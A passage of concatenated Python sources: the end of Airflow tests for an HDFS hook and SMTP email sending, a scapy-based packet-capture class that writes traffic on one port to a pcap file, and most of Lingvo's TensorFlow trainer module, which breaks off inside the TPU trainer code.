self.assertEqual('someone', c.proxy_user)
HDFSHook = None # type: Optional[hdfs_hook.HDFSHook]
snakebite = None # type: None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class TestHDFSHook(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class TestEmail(unittest.TestCase):
def setUp(self):
conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_once_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'email_backend'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_once_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class TestEmailSmtp(unittest.TestCase):
def setUp(self):
conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = 'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual('attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_once_with(
conf.get('smtp', 'SMTP_USER'),
conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_once_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'smtp_ssl'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'smtp_user'): None,
('smtp', 'smtp_password'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
sniffer.py
|
import threading
import os
import layers.packet
from scapy.all import sniff
from scapy.utils import PcapWriter
class Sniffer():
"""
The sniffer class lets the user begin and end sniffing whenever in a given location with a port to filter on.
Call start_sniffing to begin sniffing and stop_sniffing to stop sniffing.
"""
def __init__(self, location, port, logger):
"""
Intializes a sniffer object.
Needs a location and a port to filter on.
"""
self.stop_sniffing_flag = False
self.location = location
self.port = port
self.pcap_thread = None
self.packet_dumper = None
self.logger = logger
full_path = os.path.dirname(location)
assert port, "Need to specify a port in order to launch a sniffer"
if not os.path.exists(full_path):
os.makedirs(full_path)
def __packet_callback(self, scapy_packet):
"""
This callback is called whenever a packet is applied.
Returns true if it should finish, otherwise, returns false.
"""
packet = layers.packet.Packet(scapy_packet)
for proto in ["TCP", "UDP"]:
if(packet.haslayer(proto) and ((packet[proto].sport == self.port) or (packet[proto].dport == self.port))):
break
else:
return self.stop_sniffing_flag
self.logger.debug(str(packet))
self.packet_dumper.write(scapy_packet)
return self.stop_sniffing_flag
def __spawn_sniffer(self):
"""
Saves pcaps to a file. Should be run as a thread.
Ends when the stop_sniffing_flag is set. Should not be called by user
"""
self.packet_dumper = PcapWriter(self.location, append=True, sync=True)
while(self.stop_sniffing_flag == False):
sniff(stop_filter=self.__packet_callback, timeout=1)
def start_sniffing(self):
"""
Starts sniffing. Should be called by user.
"""
self.stop_sniffing_flag = False
self.pcap_thread = threading.Thread(target=self.__spawn_sniffer)
self.pcap_thread.start()
self.logger.debug("Sniffer starting to port %d" % self.port)
def __enter__(self):
"""
Defines a context manager for this sniffer; simply starts sniffing.
"""
self.start_sniffing()
return self
def __exit__(self, exc_type, exc_value, tb):
"""
Defines exit context manager behavior for this sniffer; simply stops sniffing.
"""
self.stop_sniffing()
def stop_sniffing(self):
"""
Stops the sniffer by setting the flag and calling join
"""
if(self.pcap_thread):
self.stop_sniffing_flag = True
self.pcap_thread.join()
self.logger.debug("Sniffer stopping")
|
trainer.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=line-too-long
"""Trainer.
To run locally:
.. code-block:: bash
$ bazel build -c opt //lingvo:trainer
$ bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 --run_locally=cpu
To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`.
"""
# pylint: enable=line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import os
import re
import threading
import time
import numpy as np
import six
from six.moves import zip
import tensorflow as tf
from lingvo import base_runner
from tensorflow.core.protobuf import config_pb2
from lingvo import base_trial
from lingvo import model_registry
from lingvo.core import base_model
from lingvo.core import base_model_params
from lingvo.core import cluster_factory
from lingvo.core import inference_graph_exporter
from lingvo.core import metrics
from lingvo.core import py_utils
tf.flags.DEFINE_string(
'model', '', 'Name of the model class to train. Must be one of those'
' defined in models.py.')
tf.flags.DEFINE_string(
'model_task_name', '', 'For multitask models: '
'select task to train/evaluate/decode. '
'Empty means to sample a task (training only).')
tf.flags.DEFINE_string('logdir', '', 'Log directory.')
tf.flags.DEFINE_bool(
'interactive', False,
'If True, enter interactive IPython for the controller job.')
tf.flags.DEFINE_string(
'run_locally', None,
'If True, ignores flags below and runs controller and trainer '
'in the single process.')
tf.flags.DEFINE_string('tf_master', '', 'TF runtime.')
tf.flags.DEFINE_string(
'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. '
'The dict is specified as: job=host1:port1,host2:port2,'
'host3:port3@job2=host3:port4,...')
tf.flags.DEFINE_string(
'mode', 'async', 'How this trainer binary is used. '
'async: used in an async training setup; '
'sync: used in a sync training setup; '
'shell: an interactive shell for development; '
'inspect_evaler: print evaler dataset names; '
'inspect_decoder: print decoder dataset names; '
'write_inference_graph: write inference graphs to logdir.')
tf.flags.DEFINE_string('job', '', 'trainer/controller/eval, etc.')
tf.flags.DEFINE_integer('task', 0, 'Task id within the job.')
tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.')
tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.')
tf.flags.DEFINE_string('worker_job', '/job:trainer', 'Job name.')
tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_integer('worker_tpus', 0, 'Number of tpus to use per replica.')
tf.flags.DEFINE_integer('worker_num_tpu_hosts', 0, 'Number of tpu hosts.')
tf.flags.DEFINE_integer('worker_split_size', 1,
'Number of devices for one split.')
tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name')
tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('input_job', '/job:input', 'Job name')
tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_string('evaler_job', '/job:evaler', 'Job name')
tf.flags.DEFINE_integer('evaler_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('evaler_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('decoder_job', '/job:decoder', 'Job name')
tf.flags.DEFINE_integer('decoder_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('decoder_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_bool(
'evaler_in_same_address_as_controller', False,
'Whether or not evaler is in the same address space as '
' controller. This flag is meant for unittest only.')
tf.flags.DEFINE_string(
'vizier_reporting_job', 'evaler',
'Job reponsible for reporting metrics. This specifies a '
'job prefix, evaler will match all evaler jobs, while '
'evaler_dev and decoder_dev will only match the corresponding '
'jobs that are on the dev set.')
FLAGS = tf.flags.FLAGS
# useful for debugging.
def _StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def _ModelAnalysis(model):
"""Returns a text showing variable sizes and their total size."""
class Analyzer(object):
def __init__(self):
self._seen_var = {}
self.total = 0
def __call__(self, v):
assert isinstance(v, tf.Variable)
# pylint: disable=protected-access
if not v.shape.is_fully_defined():
# Only Cudnn RNN params lack static shapes.
if hasattr(v, 'approx_size'):
size = v.approx_size
else:
return '%-20s %10s %s' % (v.shape, 'n/a', v._shared_name)
else:
size = v.shape.num_elements()
if v._shared_name not in self._seen_var:
self._seen_var[v._shared_name] = size
self.total += size
return '%-20s %10d %s' % (v.shape, size, v._shared_name)
analyzer = Analyzer()
output = '\n'
output += model.vars.Transform(analyzer).DebugString()
output += '\n'
output += '=' * 100
output += '\ntotal #params: %10d\n' % (analyzer.total)
return output, analyzer.total
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super(Controller, self).__init__(*args, **kwargs)
assert not self._model_task_name, 'Controller needs all tasks!'
self._save_path = os.path.join(self._train_dir, 'ckpt')
tf.gfile.MakeDirs(self._train_dir)
self._control_dir = os.path.join(self._logdir, 'control')
tf.gfile.MakeDirs(self._control_dir)
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._time_steps = [] # A short history of (timestamp, global_step)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._saver = self._GetSaver()
self._summary_op = tf.summary.merge_all()
self._vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
self._uninitialized = tf.report_uninitialized_variables(self._vars)
self._initialize_all = tf.global_variables_initializer()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = _ModelAnalysis(self._model)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
tf.train.write_graph(self._graph.as_graph_def(), self._control_dir,
'train.pbtxt')
def Start(self):
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
self._summary_writer.add_graph(self._graph)
with tf.container(self._container_id), self._GetSession() as sess:
gsteps = self._model.global_step
examples = self._model.total_examples
if FLAGS.interactive:
# Into interactive debugging mode.
_StartShell(locals())
return
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
save_interval_seconds = tp.save_interval_seconds
summary_interval_steps = tp.summary_interval_steps
next_checkpoint_seconds = 0
next_summary_step = 1
while True:
now = time.time()
next_iteration_seconds = now + 10 # 10 seconds
# Init/restore variable if needed.
self._RestoreIfNeeded(sess)
global_step, total_examples = sess.run([gsteps, examples])
step_rate, example_rate = self._RecordStepRate(global_step,
total_examples)
if self._trial.ShouldStop() or self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
self._saver.save(sess, self._save_path, gsteps)
# Close all the queues so the enqueue threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
sess.close()
return
# Checkpoint.
if now >= next_checkpoint_seconds:
tf.logging.info('Save checkpoint')
path = self._saver.save(sess, self._save_path, gsteps)
tf.logging.info('Save checkpoint done: %s', path)
next_checkpoint_seconds = now + save_interval_seconds
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
tf.logging.info('Write summary @%s', global_step)
summary_str = sess.run(self._summary_op)
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
next_summary_step = global_step + summary_interval_steps
tf.logging.info('Write summary done: step %d', global_step)
self._SetStatusMessage(
'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' %
(global_step, step_rate, example_rate))
self._ExportMetrics(
global_step=global_step,
step_rate=step_rate,
example_rate=example_rate)
now = time.time()
if now < next_iteration_seconds:
time.sleep(next_iteration_seconds - now)
def _RestoreIfNeeded(self, sess):
uninitialized_var_names = list(sess.run(self._uninitialized))
if not uninitialized_var_names:
return
tf.logging.info('Uninitialized var list: %s ', uninitialized_var_names)
path = tf.train.latest_checkpoint(self._train_dir)
if path:
tf.logging.info('Load from checkpoint %s.', path)
self._saver.restore(sess, path)
tf.logging.info('Load checkpoint done.')
return
if (not any(task.params.train.init_from_checkpoint_rules
for task in self._model.tasks) and
not self._params.train.init_from_checkpoint_rules):
tf.logging.info('Initialize ALL variables: %s', uninitialized_var_names)
sess.run([self._initialize_all])
tf.logging.info('Initialize variables done.')
return
# There was a race in local run. Another thread will get unblocked once
# _initialize_all is called. OverrideVarsFromCheckpoints
# might not happen at the right time.
for task in self._model.tasks:
tp = task.params.train
if tp.init_from_checkpoint_rules:
tf.logging.info('OverrideVarsFromCheckpoints %s',
tp.init_from_checkpoint_rules)
py_utils.OverrideVarsFromCheckpoints(sess, self._vars,
tp.init_from_checkpoint_rules)
if self._params.train.init_from_checkpoint_rules:
tp = self._params.train
tf.logging.info('OverrideVarsFromCheckpoints %s',
tp.init_from_checkpoint_rules)
py_utils.OverrideVarsFromCheckpoints(sess, self._vars,
tp.init_from_checkpoint_rules)
uninitialized_var_names = list(sess.run(self._uninitialized))
if not uninitialized_var_names:
return
# uninitialized_var_names is a list of strings without ":0" suffix.
assert all(isinstance(s, str) for s in uninitialized_var_names)
# Need to retrieve vars, removing ":0" suffix from names.
uninitialized_vars = [
v for v in self._vars if v.name[:-2] in uninitialized_var_names
]
tf.logging.info('Initialize variables: %s',
[v.name for v in uninitialized_vars])
sess.run(tf.variables_initializer(uninitialized_vars))
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _RecordStepRate(self, current_steps, total_examples):
"""Computes the overall step rate and adds a summary."""
self._time_steps.append((time.time(), current_steps, total_examples))
# Keeps a relative long history to compute a smooth steps/second.
# Removes duplicate stats for step = 0 to get rid of the warm-up period.
while (self._time_steps[-1][1] - self._time_steps[0][1] > 10000 or
(len(self._time_steps) > 1 and self._time_steps[-1][1] == 0 and
self._time_steps[0][1] == 0)):
del self._time_steps[0]
(t0, s0, e0), (t1, s1, e1) = self._time_steps[0], self._time_steps[-1]
rate = 0.0
example_rate = 0.0
if t1 > t0 + 1:
elapsed_secs = t1 - t0
rate = (s1 - s0) / elapsed_secs
example_rate = (e1 - e0) / elapsed_secs
tf.logging.info('Steps/second: %f, Examples/second: %f', rate, example_rate)
self._SummarizeValue(current_steps,
'%s/sec' % self._model.global_step.op.name, rate)
self._SummarizeValue(current_steps, 'examples/sec', example_rate)
return rate, example_rate
class Trainer(base_runner.BaseRunner):
"""Trainer on non-TPU."""
def __init__(self, *args, **kwargs):
super(Trainer, self).__init__(*args, **kwargs)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
try:
self._task_probs_summary_writers = []
for task in self._model.task_schedule.tasks:
path = os.path.join(os.path.join(self._train_dir, task))
tf.gfile.MakeDirs(path)
self._task_probs_summary_writers.append(self._CreateSummaryWriter(path))
except AttributeError:
tf.logging.info('AttributeError. Expected for single task models.')
self._task_probs_summary_writers = []
# Saves the graph def.
if self.params.cluster.task > 0:
self._summary_writer = None
else:
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
worker_id = self.params.cluster.task
self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) *
self.params.train.start_up_delay_steps)
def _SummarizeValue(self, steps, tag, value, writer):
if writer:
writer.add_summary(metrics.CreateScalarSummary(tag, value), steps)
def Start(self):
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
return super(Trainer, self)._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
global_step = None
@py_utils.Retry(retry_value=(tf.errors.FailedPreconditionError,))
def _WaitTillInit():
"""Wait until the model is ready."""
try:
global_step = sess.run(self._model.global_step)
except tf.errors.FailedPreconditionError as e:
tf.logging.info('Probably the expected race on global_step: %s', e)
raise
msg = 'step:%6d' % global_step
self._SetStatusMessage(msg)
if global_step < self._start_up_delay_steps:
msg = 'global step (%d) has not reached start up delay steps (%d)' % (
global_step, self._start_up_delay_steps)
tf.logging.info('%s', msg)
raise tf.errors.FailedPreconditionError(
node_def=None, op=None, message=msg)
return global_step
global_step = _WaitTillInit()
status_interval_steps = 100
next_status_step = 1
eval_metrics = None
while True:
if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or
self._ShouldStop(sess, global_step)):
tf.logging.info('Training finished.')
# Close all the queues so the enque threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
if self._early_stop:
time.sleep(300) # controller hangs if it doesn't finish first
return
# If a task is explicitly specified, only train that task.
if self._model_task_name:
model_task = self._model.GetTask(self._model_task_name)
else:
# Note: This is a slightly stale global_step value from the previous
# sess.run() call.
# For multi-task models, `self._model.task_schedule.cur_probs` will
# be updated.
model_task = self._model.SampleTask(global_step)
if self._task_probs_summary_writers:
for index, prob in enumerate(self._model.task_schedule.cur_probs):
self._SummarizeValue(global_step, 'task_probability', prob,
self._task_probs_summary_writers[index])
try:
for index, task in enumerate(self._model.tasks):
self._SummarizeValue(global_step, 'task_weight',
sess.run(task.vars.task_weight),
self._task_probs_summary_writers[index])
except AttributeError:
pass
_, global_step, eval_metrics, per_example_tensors = sess.run([
model_task.train_op,
self._model.global_step,
model_task.eval_metrics,
model_task.per_example_tensors,
])
msg = 'step:%6d' % (global_step)
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val, self._summary_writer)
model_task.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
if global_step >= next_status_step:
self._SetStatusMessage(msg)
next_status_step = global_step + status_interval_steps
else:
tf.logging.info(msg)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super(TrainerTpu, self).__init__(*args, **kwargs)
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
def ComputationShape(split_size):
"""Decides the computation shape based on the split_size."""
computation_shape = None
if split_size == 1:
computation_shape = [1, 1, 1]
elif split_size == 2:
computation_shape = [1, 1, 2]
elif split_size == 4:
computation_shape = [1, 2, 2]
elif split_size == 8:
computation_shape = [2, 2, 2]
elif split_size == 16:
computation_shape = [4, 2, 2]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitTillInit():
"""Wait until the model is ready."""
try:
with self._GetSession() as sess:
topology = sess.run(
tf.contrib.tpu.initialize_system(embedding_config=None, job=None))
device_assignment = tf.contrib.tpu.device_assignment(
topology,
computation_shape=ComputationShape(num_devices_per_split),
num_replicas=data_parallelism)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitTillInit()
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.job_spec.name):
self._eval_metrics = metrics.TpuEvalMetrics()
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model = self.params.cls(self.params)
self._model.ConstructFPropBPropGraph()
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._model.GetTask().eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(
self._model.GetTask().per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._model.GetTask().train_op]
def TpuTrain():
loop_result = tf.contrib.tpu.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
batch_parallel_res = tf.contrib.tpu.batch_parallel(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._model.GetTask().per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
# Get metric result from a single replica; they are all same here.
self._tpu_train_ops = [[t[0] for t in batch_parallel_res],
outfeed_dequeue_op]
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
# Saves the graph def.
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tf.contrib.tpu.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
